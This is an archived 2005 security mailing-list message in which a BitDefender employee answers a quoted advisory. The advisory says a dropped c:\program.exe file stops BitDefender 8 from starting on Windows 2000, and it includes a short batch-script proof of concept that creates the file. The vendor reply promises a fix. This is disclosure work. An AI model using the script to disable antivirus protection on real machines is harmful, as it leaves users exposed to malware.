|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: BitDefender 8 - Race condition vulnerability
From: Ovidiu Constantin (oconstantin
bitdefender.com)
Date: Mon Apr 25 2005 - 09:47:16 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Īn data de Sī, 23-04-2005 la 03:03 +0000, SecuBox fRoGGz a scris:
>
> -----------------------------
> Product: BitDefender
> Version: 8
> Tested on: Windows 2000 SP4
> Vulnerability: Race condition
> -----------------------------
>
> BACKGROUND
> ----------
> BitDefender ensures the most advanced antivirus protection, as well as data
> confidentiality, active content control and Internet filtering.
> A powerful antivirus tool with features that best meet your security needs.
> Source: www.bitdefender.com
>
>
> VULNERABLE PRODUCTS
> -------------------
> BitDefender 8 Professional Plus
> BitDefender 8 Standard Edition
> Maybe other...
>
>
> RACE CONDITION
> --------------
> At Windows startup, when a file named: program.exe is found on c:\
> Windows send an alert message, messagebox controls are:
> 2 buttons -> "Rename" or "Ignore"
> 1 checkbox -> [X] Do not do this verification on startup.
> (Sorry, haven't got the exact english message)
>
> At this moment, BitDefender can't start, so we have a session without virus protection.
>
>
> PROOF OF CONCEPT
> ----------------
> Open your notepad.exe and paste this batch script.
>
> echo off
> echo #-------------------------------------------------------#
> echo [ SecuBox - Proof of Concept (04.12.2005) ]
> echo #-------------------------------------------------------#
> echo # This script just create the race condition. #
> echo # It might be use by virus. #
> echo # Now, reboot your computer and watch your BitDef ! #
> echo #-------------------------------------------------------#
> echo # Be carefull, for virus protection need another reboot #
> echo # Closing your Windows session is not sufficient ! #
> echo #-------------------------------------------------------#
> echo BitDef PoC > c:\program.exe
> pause
> exit
>
>
> EXPLOITATION
> ------------
> Save this batch script as TEST.BAT and try it.
>
>
> VENDOR STATUS
> -------------
> Vendor have been contacted but no reply ...
>
>
> CREDITS
> ----------------------
> SecuBox Labs - fRoGGz
> unsecurewriteme.com
> ----------------------
Thanks for informing us about this issue. Now we are aware of it and in
short time all BitDefender installation kits will be updated in order
to fix it. The quick fix is to put all the start up commands between "
".
We will keep you posted.
--
Ovidiu Constantin - PGP/GPG Key ID 0xBF7F01FF
BitDefender Linux/Unices Testing Project Manager
SOFTWIN / Data Security Division / BitDefender
http://linux.bitdefender.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)
iD8DBQBCbQL04a9c+r9/Af8RAk3wAJ0WWN62bBLmGLFOlbTi1sUYO52j8wCeM2wQ
mNVE2PRw2txyWZLrXQCbIfU=
=rUIL
-----END PGP SIGNATURE-----
--
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://linux.bitdefender.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]